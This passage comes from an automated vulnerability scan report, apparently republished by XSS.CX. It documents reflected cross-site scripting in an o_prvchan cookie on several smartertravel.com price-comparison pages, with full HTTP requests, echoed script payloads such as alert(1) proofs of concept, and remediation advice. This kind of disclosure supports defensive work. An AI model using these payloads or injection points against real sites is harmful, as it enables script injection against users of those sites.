P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:46:23 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:46:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:46:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Cruise; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 38014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
="SmarterTravel BookingBuddy Affiliate: cruise";s.eVar25="SmarterTravel BookingBuddy Affiliate: cruise";s.eVar37="1|I5";s.channel="Compare Prices | Cruise";s.eVar24="Compare Prices | Cruise";s.eVar19="e0ca3</script><script>alert(1)</script>3ee3f4baebf";s.server="app2";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

2.119. http://www.smartertravel.com/compare-prices/flights/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/flights/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c92fb</script><script>alert(1)</script>9adf7b3319 was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/flights/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=c92fb</script><script>alert(1)</script>9adf7b3319; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:40:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:23 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:40:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Airfare; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 54868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
Name="SmarterTravel BookingBuddy Affiliate: air";s.eVar25="SmarterTravel BookingBuddy Affiliate: air";s.eVar37="1|I5";s.channel="Compare Prices | Airfare";s.eVar24="Compare Prices | Airfare";s.eVar19="c92fb</script><script>alert(1)</script>9adf7b3319";s.server="app4";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

2.120. http://www.smartertravel.com/compare-prices/hotel/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/hotel/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ac51</script><script>alert(1)</script>c661c4cfb44 was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/hotel/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=2ac51</script><script>alert(1)</script>c661c4cfb44; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:53:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: pb_st499=5e57f11eb420551edc3093c5ee30968fa%3A1%3A%7Bs%3A5%3A%22st499%22%3Bs%3A7%3A%22current%22%3B%7D; expires=Mon, 13-Dec-2010 23:53:40 GMT; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:53:45 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:53:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:53:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Hotel; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 37597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
Name="SmarterTravel BookingBuddy Affiliate: hotel";s.eVar25="SmarterTravel BookingBuddy Affiliate: hotel";s.eVar37="1|I5";s.channel="Compare Prices | Hotel";s.eVar24="Compare Prices | Hotel";s.eVar19="2ac51</script><script>alert(1)</script>c661c4cfb44";s.server="app3";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";s.eVar16="ST Site Compare Prices AFS and TA R2 - Recipe A";
/************* DO NOT ALTER ANYTHING BELOW
...[SNIP]...

2.121. http://www.smartertravel.com/compare-prices/vacation-package/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-package/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f5fd</script><script>alert(1)</script>759eb100751 was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/vacation-package/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=4f5fd</script><script>alert(1)</script>759eb100751; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 21:30:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:30:48 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:30:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:30:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Vacation+Packages; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
dy Affiliate: vacation";s.eVar25="SmarterTravel BookingBuddy Affiliate: vacation";s.eVar37="1|I5";s.channel="Compare Prices | Vacation Packages";s.eVar24="Compare Prices | Vacation Packages";s.eVar19="4f5fd</script><script>alert(1)</script>759eb100751";s.server="app2";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

2.122. http://www.smartertravel.com/compare-prices/vacation-rentals/ [o_prvchan cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-rentals/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbf5</script><script>alert(1)</script>f830f52e33e was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/vacation-rentals/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=bdbf5</script><script>alert(1)</script>f830f52e33e; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:35:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:35:40 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:35:40 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:35:40 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Vacation+Rentals; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
: vacation_rental";s.eVar25="SmarterTravel BookingBuddy Affiliate: vacation_rental";s.eVar37="1|I5";s.channel="Compare Prices | Vacation Rentals";s.eVar24="Compare Prices | Vacation Rentals";s.eVar19="bdbf5</script><script>alert(1)</script>f830f52e33e";s.server="app1";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

Report generated by XSS.CX at Sun Nov 14 16:16:37 CST 2010.